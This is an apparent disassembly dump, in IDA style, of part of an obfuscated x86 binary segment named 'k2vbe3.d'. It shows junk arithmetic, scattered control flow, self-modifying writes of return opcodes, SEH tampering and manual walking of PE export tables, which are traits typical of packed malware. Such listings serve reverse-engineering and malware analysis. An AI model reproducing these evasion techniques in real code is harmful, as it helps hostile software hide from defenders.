loc_446BBA:				; CODE XREF: k2vbe3.d:004513B4j
		jle	loc_45B00E
		jl	loc_440F6C
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_446BC6:				; CODE XREF: sub_444B3E:loc_4513A7j
		xor	edi, 70F16B84h
		push	offset sub_45A69B
		jmp	loc_43EA33
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		mov	eax, 3C248B30h
		call	sub_4553CC
		push	esi
		push	0AD4232D1h
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_446BE6:				; CODE XREF: sub_444EFA:loc_446E16j
		jmp	loc_44B276
; END OF FUNCTION CHUNK	FOR sub_444EFA

; =============== S U B	R O U T	I N E =======================================



sub_446BEB	proc near		; DATA XREF: k2vbe3.d:00450CA0o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C118 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FF92 SIZE 00000005 BYTES

		push	7B77D854h
		pop	edx
		or	edx, 86790A2Ah
		rol	edx, 1Ch
		jmp	loc_43C118
sub_446BEB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_446BFF:				; CODE XREF: sub_4575BD-54C4j
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_4575BD
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_446C00:				; CODE XREF: sub_43CCD0+C67j
					; sub_451EEA-13C1Cj ...
		jno	loc_443A1B
		cmp	byte ptr [ebp-5], 0
		jnz	loc_440F45
		jmp	loc_442B48
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEFF

loc_446C15:				; CODE XREF: sub_43DEFF:loc_44C20Ej
		pop	ecx
		rol	ecx, 0Ch
		xor	ecx, 0CF3174F5h
		and	ecx, 3ECDA2Ah
		add	ecx, 0FEBBDC29h
		xchg	ecx, [esp+4+var_4]
		jmp	sub_448D3A
; END OF FUNCTION CHUNK	FOR sub_43DEFF
; ---------------------------------------------------------------------------
		db 9, 0C0h
; ---------------------------------------------------------------------------
		jmp	loc_44D2E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_446C3A:				; CODE XREF: sub_446478:loc_442A8Dj
		pushf
		jmp	loc_449FF2
; END OF FUNCTION CHUNK	FOR sub_446478
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_489. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_446C41:				; CODE XREF: sub_45AB7E+11j
		jmp	locret_446671
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_446C46:				; CODE XREF: sub_4460FD+D205j
		xchg	esi, [edi]
		shl	esi, 17h
		cmp	esi, eax
		jmp	loc_447BF7
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_446C52:				; CODE XREF: sub_451EB7-5745j
		mov	eax, [ebp-0Ch]
		mov	ecx, 3F5h
		xor	edx, edx
		div	ecx
		jmp	loc_453E85
; END OF FUNCTION CHUNK	FOR sub_451EB7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_538. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_446C64:				; CODE XREF: sub_441DCC+1DD3j
		or	edx, 0DC1B1891h
		cmp	edx, 3F0A951Fh
		jmp	loc_45187E
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------

loc_446C75:				; CODE XREF: k2vbe3.d:0043CAA9j
		jnz	loc_45683D
		jmp	loc_4500CF
; ---------------------------------------------------------------------------

loc_446C80:				; CODE XREF: k2vbe3.d:004491FAj
		cdq

loc_446C81:				; CODE XREF: k2vbe3.d:loc_4491DBj
		xor	eax, 237FE228h
		call	sub_4553CC
		mov	ds:off_41E08C, eax
		call	sub_44AD65
; START	OF FUNCTION CHUNK FOR sub_45A252

loc_446C97:				; CODE XREF: sub_45A252-14EEAj
		jmp	loc_43DF6C
; END OF FUNCTION CHUNK	FOR sub_45A252
; ---------------------------------------------------------------------------
		and	edx, eax
		jmp	loc_43CEC6
; ---------------------------------------------------------------------------

loc_446CA3:				; DATA XREF: sub_452C99+6209o
		xchg	esi, [esp]
		push	esi
		pop	ecx
		pop	esi
		pop	ebp
		jmp	sub_44B2D7
; ---------------------------------------------------------------------------

loc_446CAF:				; CODE XREF: k2vbe3.d:loc_4451DAj
					; k2vbe3.d:loc_449F86j
		jmp	ds:off_41E010
; ---------------------------------------------------------------------------

loc_446CB5:				; CODE XREF: k2vbe3.d:00451562j
		jmp	sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_446CBA:				; CODE XREF: sub_45B4A2-1EF3Fj
		jmp	loc_44A2D7
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_446CBF:				; CODE XREF: k2vbe3.d:00448B59j
					; sub_4490B2:loc_4490BCj ...
		jnb	loc_4490C1
		push	offset loc_43CFF6
		jmp	loc_4518E7
; END OF FUNCTION CHUNK	FOR sub_4490B2

; =============== S U B	R O U T	I N E =======================================



sub_446CCF	proc near		; CODE XREF: sub_44D887+9p
					; k2vbe3.d:00457D9Bj

; FUNCTION CHUNK AT 0043C2C8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D154 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D5EE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F547 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004508DF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004517C2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004539DA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455692 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004563CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004587BD SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	edx, [ebp-20h]
		mov	[edx], al
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		cmp	byte ptr [eax],	2Eh
		jmp	loc_4587BD
sub_446CCF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_446CE6	proc near		; DATA XREF: sub_4455EE:loc_4508F5o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C491 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C9D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FBA9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441264 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441D9B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448D7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACBB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EB34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004559A9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456588 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045B412 SIZE 00000005 BYTES

		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	edx, [esp+0]
		push	edx
		pop	ebp
		xchg	ebx, [esp+0]
		mov	edx, ebx
		jmp	loc_441264
sub_446CE6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_446CFA:				; CODE XREF: sub_44B870:loc_44B09Ej
		jz	loc_452EA9
		jmp	loc_4478D9
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
		cmp	ecx, ebx
		jmp	loc_44BAB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_446D0C:				; CODE XREF: sub_44F174:loc_455A20j
		jnz	loc_440CA7

loc_446D12:				; CODE XREF: sub_4583B8-145FBj
		jmp	loc_4430CD
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
		sub	ecx, esi
		add	esi, 0D6ECD1AAh
		jmp	loc_440CA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_446D24:				; CODE XREF: sub_44B8EF-A489j
					; sub_44B8EF:loc_45BCE3j
		mov	eax, 0CF0182F6h
		push	ebx
		push	0CCB0E654h
		pop	ebx
		add	ebx, 0D5D14136h
		jmp	loc_44175D
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------

loc_446D3B:				; CODE XREF: k2vbe3.d:0044D835j
		xor	edi, 0FFBC03C7h

; =============== S U B	R O U T	I N E =======================================



sub_446D41	proc near		; CODE XREF: sub_45301Fp
		xchg	edi, [esp+0]
		pop	edi
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, [ebp-10h]
		jmp	sub_4439B9
sub_446D41	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446D57:				; CODE XREF: k2vbe3.d:loc_43C922j
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_446D58:				; CODE XREF: sub_4424CF:loc_442518j
		lea	eax, nullsub_2
		mov	byte ptr [eax],	0C3h
		jmp	loc_4400B5
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C579

loc_446D66:				; CODE XREF: sub_44C579j
		mov	eax, [esp+0]
		jmp	loc_451015
; END OF FUNCTION CHUNK	FOR sub_44C579
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_446D6E:				; CODE XREF: sub_44B870-8A4Aj
		jz	loc_451484
		jmp	loc_442B35
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442745

loc_446D79:				; CODE XREF: sub_442745+Aj
		push	0C5F5F00Fh
		pop	edx
		rol	edx, 1Bh
		sub	edx, 441B05F6h
		jmp	loc_444D2B
; END OF FUNCTION CHUNK	FOR sub_442745
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_335. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_446D8E:				; CODE XREF: sub_444B3E+D4AAj
		jmp	loc_44F38F
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DADB

loc_446D93:				; CODE XREF: sub_43DADB+3j
		jmp	nullsub_483
; END OF FUNCTION CHUNK	FOR sub_43DADB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445047

loc_446D98:				; CODE XREF: sub_445047:loc_4585E3j
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		call	sub_45AA25
; END OF FUNCTION CHUNK	FOR sub_445047
; START	OF FUNCTION CHUNK FOR sub_455500

loc_446DA5:				; CODE XREF: sub_455500+16j
		jmp	nullsub_248
; END OF FUNCTION CHUNK	FOR sub_455500
; ---------------------------------------------------------------------------

loc_446DAA:				; CODE XREF: k2vbe3.d:0045BB2Bj
		pop	ecx
		add	ecx, 26FA0C09h
		or	ecx, 0C95E3EC5h
		sub	ecx, 1E11C49Bh

loc_446DBD:				; CODE XREF: k2vbe3.d:loc_451F03j
		and	ecx, 871F16CDh
		jmp	loc_44F5C3
; ---------------------------------------------------------------------------

loc_446DC8:				; DATA XREF: sub_43D942:loc_45A7A5o
		add	edx, 88361037h
		xchg	edx, [esp]
		jmp	loc_4596D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_490. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_446DD7:				; CODE XREF: k2vbe3.d:00459BF2j
		jmp	loc_457ED1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4472D9

loc_446DDC:				; CODE XREF: sub_4472D9:loc_444B75j
		rol	eax, 3
		and	eax, 2CBA7C37h
		add	eax, 0D40A84F2h
		xchg	eax, [esp+4+var_4]
		jmp	sub_448D3A
; END OF FUNCTION CHUNK	FOR sub_4472D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_446DF3:				; CODE XREF: sub_442F31+9255j
					; k2vbe3.d:00455BB0j ...
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		mov	ecx, eax
		xchg	ecx, [esp+0]
		lea	eax, loc_442184
		push	eax
		jmp	loc_4437F0
; END OF FUNCTION CHUNK	FOR sub_442F31
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_389. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_446E0B:				; CODE XREF: sub_447664+497Fj
		jmp	loc_442543
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_446E10:				; CODE XREF: sub_44F1A6-6A5Bj
		jb	loc_4538B5
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_446E16:				; CODE XREF: sub_44F174-12E46j
					; sub_444EFA-8BBEj ...
		jmp	loc_446BE6
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4583B8

loc_446E1B:				; CODE XREF: sub_4583B8+18j
					; sub_44F1A6+AC98j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4583B8

; =============== S U B	R O U T	I N E =======================================



sub_446E1E	proc near		; CODE XREF: k2vbe3.d:004434CBp
					; sub_44803D+3401p ...

; FUNCTION CHUNK AT 00441C4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004477AA SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044836E SIZE 00000012 BYTES

		push	ebp
		jmp	loc_4477AA
sub_446E1E	endp


; =============== S U B	R O U T	I N E =======================================



sub_446E24	proc near		; DATA XREF: sub_44F028-F290o

; FUNCTION CHUNK AT 0043E23D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E7C1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00440311 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440DD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441592 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442893 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430FF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443B4B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443DCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444C72 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044510A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446687 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00447283 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004480F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448AD0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00448BCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448DE9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044980F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A023 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A774 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A975 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AACF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B314 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CD8F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044DE55 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F92A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FA3B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451ACB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004522D9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453232 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453D65 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454ACA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C6B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454FD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004574D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004589BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459B31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A1A1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045AA4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B003 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B2CE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B8F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B982 SIZE 00000014 BYTES

		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_440DD7
sub_446E24	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446E35:				; CODE XREF: k2vbe3.d:00446A84j
		popf

loc_446E36:				; CODE XREF: k2vbe3.d:loc_44D2DBj
		push	0CEC60061h
		pop	eax
		xor	eax, 339E26C5h
		add	eax, 180F98DDh
		and	eax, 7E21E972h
		test	eax, 800h
		jmp	loc_456E1D
; ---------------------------------------------------------------------------

loc_446E59:				; CODE XREF: k2vbe3.d:loc_454330j
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_476
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_476
; ---------------------------------------------------------------------------

loc_446E6A:				; CODE XREF: k2vbe3.d:0043D193j
		mov	eax, [esp]
		push	ebx
		mov	ebx, edx
		jmp	loc_455BCE
; ---------------------------------------------------------------------------

loc_446E75:				; CODE XREF: k2vbe3.d:00452B49j
					; k2vbe3.d:loc_453497j
		mov	eax, [esp]
		push	offset sub_43D942
		jmp	locret_44B704
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_446E82:				; CODE XREF: sub_4424CF+54E3j
		jnb	loc_458231

loc_446E88:				; CODE XREF: sub_4424CF:loc_44CAA6j
		mov	ecx, [ebp+var_1C]
		push	ebx
		call	sub_45346B
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_4574AE

loc_446E91:				; CODE XREF: sub_4574AE:loc_441E91j
		jmp	nullsub_241
; END OF FUNCTION CHUNK	FOR sub_4574AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADED

loc_446E96:				; CODE XREF: sub_45ADED+5j
		pushf
		call	sub_44498A
; END OF FUNCTION CHUNK	FOR sub_45ADED
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_446E9C:				; CODE XREF: sub_44F028+8j
		jmp	loc_43ECAC
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4401FF

loc_446EA1:				; CODE XREF: sub_4401FF+Aj
		jmp	loc_44ADD6
; END OF FUNCTION CHUNK	FOR sub_4401FF
; ---------------------------------------------------------------------------

loc_446EA6:				; DATA XREF: sub_43C82E+AEA0o
		push	eax
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		mov	edx, eax
		push	offset sub_442475
		jmp	locret_43E414
; ---------------------------------------------------------------------------

loc_446EB9:				; CODE XREF: k2vbe3.d:00441532j
		cmp	edx, ebp
		jmp	loc_43D164
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_446EC0:				; CODE XREF: sub_455C7A:loc_44328Cj
		add	eax, 0B2BDE96Ch
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45AFB9
		jmp	loc_44431B
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
		mov	ds:off_41E09C, eax
		lea	eax, loc_45858F
		mov	byte ptr [eax],	0C3h
		jmp	loc_45858F
; ---------------------------------------------------------------------------
		call	sub_44AB08	; MultiByteToWideChar
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_446EEE:				; CODE XREF: sub_442DF0+5D10j
		jmp	loc_4549A6
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_446EF3:				; CODE XREF: sub_43EEC6+7942j
		jmp	loc_454881
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_446EF8:				; CODE XREF: sub_44DB59-97F6j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F5B

loc_446EFD:				; CODE XREF: sub_443F5B-2C3Aj
		jmp	nullsub_230
; END OF FUNCTION CHUNK	FOR sub_443F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_446F02:				; CODE XREF: sub_43FE2A:loc_447D80j
		mov	eax, [eax+0Ch]

loc_446F05:				; CODE XREF: sub_448C1A:loc_44FF06j
					; k2vbe3.d:00458E33j
		jz	loc_43D3A0
		mov	ebx, [eax+18h]
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_442FDC
		mov	ecx, [ebx+ecx+0Ch]
		jmp	loc_43ED71
; END OF FUNCTION CHUNK	FOR sub_43FE2A

; =============== S U B	R O U T	I N E =======================================



sub_446F26	proc near		; DATA XREF: sub_445124:loc_450D2Eo
		add	esi, 6F78F620h
		xchg	esi, [esp+0]
		jmp	sub_4414DA
sub_446F26	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A42

loc_446F34:				; CODE XREF: sub_457A42+11j
		jz	loc_44C423
		jmp	loc_458F2C
; END OF FUNCTION CHUNK	FOR sub_457A42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_446F3F:				; CODE XREF: sub_44CA34+4353j
		xor	eax, 72962172h
		sub	eax, 14AC407Bh
		jmp	loc_44F61E
; ---------------------------------------------------------------------------

loc_446F50:				; CODE XREF: sub_44CA34j
		push	0BC138004h
		pop	eax
		rol	eax, 1Ch
		or	eax, 24230A0Eh
		xor	eax, 3E42E369h
		jmp	loc_452D32
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_446F6A:				; CODE XREF: sub_444EFA-3EF5j
		add	eax, 0F6584F57h
		add	eax, ebp
		add	eax, 8875095h
		mov	eax, [eax]
		mov	al, [eax]
		jmp	loc_45BBC9
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------

loc_446F81:				; CODE XREF: k2vbe3.d:0044B9EFj
					; k2vbe3.d:loc_453BBFj
		push	0B171B5B6h
		pop	edx
		add	edx, 0D81D1E07h
		or	edx, ds:4000EEh
		add	edx, 32B30867h
		mov	[edx], eax
		pop	edx
		jmp	loc_45B71C
; ---------------------------------------------------------------------------

loc_446FA1:				; CODE XREF: k2vbe3.d:loc_43E278j
					; k2vbe3.d:loc_45C28Aj
		push	offset sub_446645
		jmp	locret_454CF7
; ---------------------------------------------------------------------------

loc_446FAB:				; CODE XREF: k2vbe3.d:loc_45C32Bj
					; DATA XREF: sub_454CAC:loc_45C321o
		xchg	edx, [esp]
		mov	eax, edx
		pop	edx
		push	0AA27D58h
		pop	eax
		and	eax, 0C28D14D2h
		jmp	loc_44F84C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_446FC2:				; CODE XREF: sub_445F6E:loc_43E7A4j
		push	6BEEAEF3h
		pop	edi
		add	edi, 0D064706Ch
		test	edi, 100h
		jmp	loc_44AFA6
; END OF FUNCTION CHUNK	FOR sub_445F6E
; ---------------------------------------------------------------------------

loc_446FD9:				; CODE XREF: k2vbe3.d:loc_452C58j
					; k2vbe3.d:00452C73j
		and	edx, 0A2FBD255h
		push	offset loc_45A6C9
		jmp	loc_458170
; ---------------------------------------------------------------------------
		db 89h,	0D1h, 69h
		dd 1070000h, 471051C1h,	0FFFF8010h, 0Bh, 0FFFF8010h, 1Fh
					; DATA XREF: sub_44B7E2+10o
		dd 0FFFF8010h, 18h, 0FFFF8010h,	29h, 0FFFF8010h, 4Bh, 0FFFF801Fh
		dd 17h,	0FFFF801Fh, 33h, 0FFFF801Fh, 13h, 0FFFF801Fh, 65h
		dd 0FFFF801Fh, 0Dh, 0FFFF801Fh,	1, 0FFFF801Fh, 6, 0FFFF801Fh
		dd 4, 0FFFF801Fh, 74h, 0FFFF801Fh, 34h,	0FFFF801Fh, 14h
		dd 0FFFF801Fh, 15h, 0FFFF801Fh,	0Fh, 0FFFF801Fh, 12h, 0FFFF801Fh
		dd 11h,	0FFFF801Fh, 0Ch, 0FFFF801Fh, 97h, 0FFFF801Fh, 0Bh
		dd 0FFFF801Fh, 0Ah, 0FFFF801Fh,	10h, 0FFFF801Fh, 9, 0FFFF801Fh
		dd 73h,	0FFFF801Fh, 5, 0FFFF801Fh, 2, 0FFFF801Fh, 3, 9E002Eh
		dd 801D01A0h, 97002Eh, 609D577Dh, 96002Eh, 0B24C760Ah
		dd 6003Eh, 2092F37Fh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4439B9

loc_447104:				; CODE XREF: sub_4439B9+1Bj
		jmp	sub_43DA01
; END OF FUNCTION CHUNK	FOR sub_4439B9
; ---------------------------------------------------------------------------
		db 0DBh, 12h, 0D4h
dword_44710C	dd 773D0000h, 0C4A842A6h, 0B8233389h, 0D8B119h,	1F7B0000h
					; DATA XREF: k2vbe3.d:0045854Ao
		dd 3412229Eh, 91C54666h, 366Ch,	0AE71AB00h, 665F2335h
		dd 0C6328B8Ch, 0B1h, 94AE7620h,	8A7229C9h, 368C8B54h, 0B1h
		dd 289A71B2h, 0D8648B94h
; ---------------------------------------------------------------------------
		mov	cl, 0
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_447156:				; CODE XREF: sub_4479A1-4AEj
		jmp	loc_453863
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	edx
		push	ecx
		push	offset sub_44D16B
		jmp	loc_44772A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_44716A:				; CODE XREF: sub_443CD9:loc_45509Bj
		jz	loc_43D872
		mov	eax, [ebp-4]
		mov	ax, [eax]
		and	ax, 38FFh
		cmp	ax, 20FFh
		jz	loc_43D872
		jmp	loc_442DCA
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_447189:				; CODE XREF: sub_444966:loc_44DCF0j
		jnz	loc_454427
		jmp	loc_43EF6E
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_447194:				; CODE XREF: sub_444EFA+6C74j
		cmp	edi, ecx
		jmp	loc_456DA5
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44719B:				; CODE XREF: sub_43F7AC+C41Dj
		push	7036031h
		pop	eax
		add	eax, 52ACA0E5h
		rol	eax, 16h

loc_4471AA:				; CODE XREF: sub_4440CA:loc_453D18j
		call	sub_44A056
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_4471AF:				; CODE XREF: sub_4426DF:loc_44AA33j
		rol	eax, 8
		sub	eax, 540A3F51h
		xor	eax, 0FB13936Bh
		rol	eax, 9
		xor	eax, 0EE1851A2h
		jmp	loc_442D6D
; ---------------------------------------------------------------------------

loc_4471CC:				; CODE XREF: sub_4426DFj
		mov	eax, ds:dword_44CA30
		push	offset loc_43F72D
		jmp	loc_43DECE
; END OF FUNCTION CHUNK	FOR sub_4426DF

; =============== S U B	R O U T	I N E =======================================



sub_4471DC	proc near		; DATA XREF: k2vbe3.d:0044D464o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FA17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044137C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445055 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004473D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447B63 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F050 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455942 SIZE 0000001C BYTES

		pop	ecx
		js	loc_447B63
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
